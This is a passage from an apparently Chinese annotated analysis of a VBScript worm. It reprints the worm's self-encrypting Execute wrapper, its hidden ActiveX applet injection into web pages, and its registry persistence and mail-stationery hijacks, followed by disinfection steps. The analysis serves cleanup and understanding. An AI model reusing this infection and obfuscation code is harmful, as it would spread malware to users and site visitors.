InWhere = "vbs" ' 是VBS文件

End If

If InWhere = "vbs" Then ' 如果安装了 SCRIPT HOST就方便了许多

Set FSO = CreateObject("Scripting.FileSystemObject")

Set WsShell = CreateObject("WScript.Shell")

Else ' 如果安装时没有选择 SCRIPT HOST 那么病毒就自己配置,看来WINDOWS没有按照用户的要求去做

Set AppleObject = document.applets("KJ_guest") ' 通过KJ_guest向系统注册一个脚本解释器

AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 'Windows Scripting Host Shell Object

AppleObject.createInstance() ' 使用SCRIPT HOST 来执行各种操作,这就是提倡大家安装98时,不要安装SCRIPT HOST的原因

Set WsShell = AppleObject.GetObject()

AppleObject.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") ' 功能强大的 FileSystem Object

AppleObject.createInstance()

Set FSO = AppleObject.GetObject()

End If

Set DiskObject = FSO.Drives ' 得到系统的硬盘和软盘驱动器

For Each DiskTemp In DiskObject

If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then

Exit For ' 如果不是硬盘或者软盘则不能感染

End If

FinalyDisk = DiskTemp.DriveLetter ' 系统中硬盘最后一个盘符

Next

Dim OtherArr(3) ' 一个随机数组

Randomize

For i = 0 To 3

OtherArr(i) = Int((9 * Rnd)) ' 从 0 到 9

Next

TempString = ""

For i = 1 To Len(ThisText) ' 从1到病毒体的长度,看来下面是对病毒的解密部分

TempNum = Asc(Mid(ThisText, i, 1)) ' 取第I处的字符ASC值

If TempNum = 13 Then ' 如果是13

TempNum = 28 ' 强制替换为28

ElseIf TempNum = 10 Then ' 如果是10

TempNum = 29 ' 强制替换为29

End If

TempChar = Chr(TempNum - OtherArr(i Mod 4)) ' I处的字符ASC码-I和4取余数

If TempChar = Chr(34) Then ' 如果等于34,则替换为18

TempChar = Chr(18)

End If

TempString = TempString & TempChar ' 已经生成了伪装好的病毒代码字符串,完全随机的

Next ' 下一句比较烦

UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ThisText = "ExeString = """ & TempString & """" HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document..write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XCom _

nent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

'UnLockStr 就是执行病毒的字符串,下面是实际执行的内容

'

'Dim KeyArr(3),ThisText

'KeyArr(0) = OtherArr(0)

'KeyArr(1) = OtherArr(1)

'KeyArr(2) = OtherArr(2)

'KeyArr(3) = OtherArr(3)

'For i=1 To Len(ExeString)

' TempNum = Asc(Mid(ExeString,i,1))

' If TempNum = 18 Then

' TempNum = 34

' End If

' TempChar = Chr(TempNum + KeyArr(i Mod 4))

' If TempChar = Chr(28) Then

' TempChar = vbCr

' ElseIf TempChar = Chr(29) Then

' TempChar = vbLf

' End If

' ThisText = ThisText & TempChar

'Next 上面执行后,已经构造成功一个ThisText命令串

' "Execute(ThisText) " 是一个字符串,网页中可以找到

' ThisText = "ExeString = TempString 字符的内容" ,这里是为THISTEXT赋值

' HtmlText =

' <script language=vbscript>

' <div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>

' <APPLET NAME=KJ_guest HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>

' </APPLET>

' </div>

' </script>

' <script language=vbscript>

' ThisText 网页中可以找到的部分,就是 "ExeString=..."

' UnLockStr Execute("Dim KeyArr(3)...."

' </script>

' </BODY>

' </HTML>

'VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

WinPath = FSO.GetSpecialFolder(0) & "\"

If (FSO.FileExists(WinPath & "web\Folder.htt")) Then ' 更深层次的感染

FSO.CopyFile WinPath & "web\Folder.htt", WinPath & "web\kjwall.gif"

End If '如果这个机器是WEB服务器,那么浏览过这个服务器的所有用户都将被感染

If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then

FSO.CopyFile WinPath & "system32\desktop.ini", WinPath & "system32\kjwall.gif"

End If

End Function

' 有了以上分析,解毒的话就方便多了

' 解毒内容

' 1. 对于HTT文件

' 第一行是病毒的开始,应但删除 开始的0X24个BYTES应当删除

' 从文件结束倒退(0X5A0A-0X2D3C+1=)0X2CCF个BYTES应当删除

' 2. 对于HTML,ASP,PHP,JSP文件

' 从文件结尾倒退(0X5E4E-0X3153+1=)0X2CFC应当删除

' 3. 对于VBS文件

' 只要删除文件最后0X2B97+2(回车)个BYTES就可以了

' 4. 至于KERNEL.DLL,可以直接删除,为保险起见,也可以删除文件最后0X2B97个BYTES

' 5. 还有kjwall.gif,直接删除.

' 6. 要对修改过的注册表进行恢复

' WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"

' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)

' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)

' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"

' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")

' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")

' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call

' KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

' WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"

' RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"

' ****************************************************************

' HKEY_CURRENT_USER\Identities\Default User ID 如果有SOFTWARE\等等的话,删除后面的SOFTWARE,其余的保留即可

' HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference 键值清空即可

' HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360 清空

' HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360 清空

' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference 清空

' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery 清空

' HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32 清空

' HKEY_CLASSES_ROOT\.dll 删除.DLL及下面所有东西

' HKEY_CLASSES_ROOT\dllfile\DefaultIcon\ 删除DLLFILE及下面所有东西

' HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command

' HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps

' HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode

' HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree 删除DEGREE及下面所有东西

• ·混合运算中数据类型的转换
• ·字符串
• ·原码、反码、补码
• ·windows API简介(系列1)
• ·Windows C++ 程序员如何过度到Sym
• ·使用Lccwin32进行MySQL开发。
• ·对Boost库中的数值到字符串的转换的改进
• ·关于互联网信息采集的思考
• ·Oracle中Blob字段的写入处理（一）
• ·十步搞定tomcat4.1.18 Servle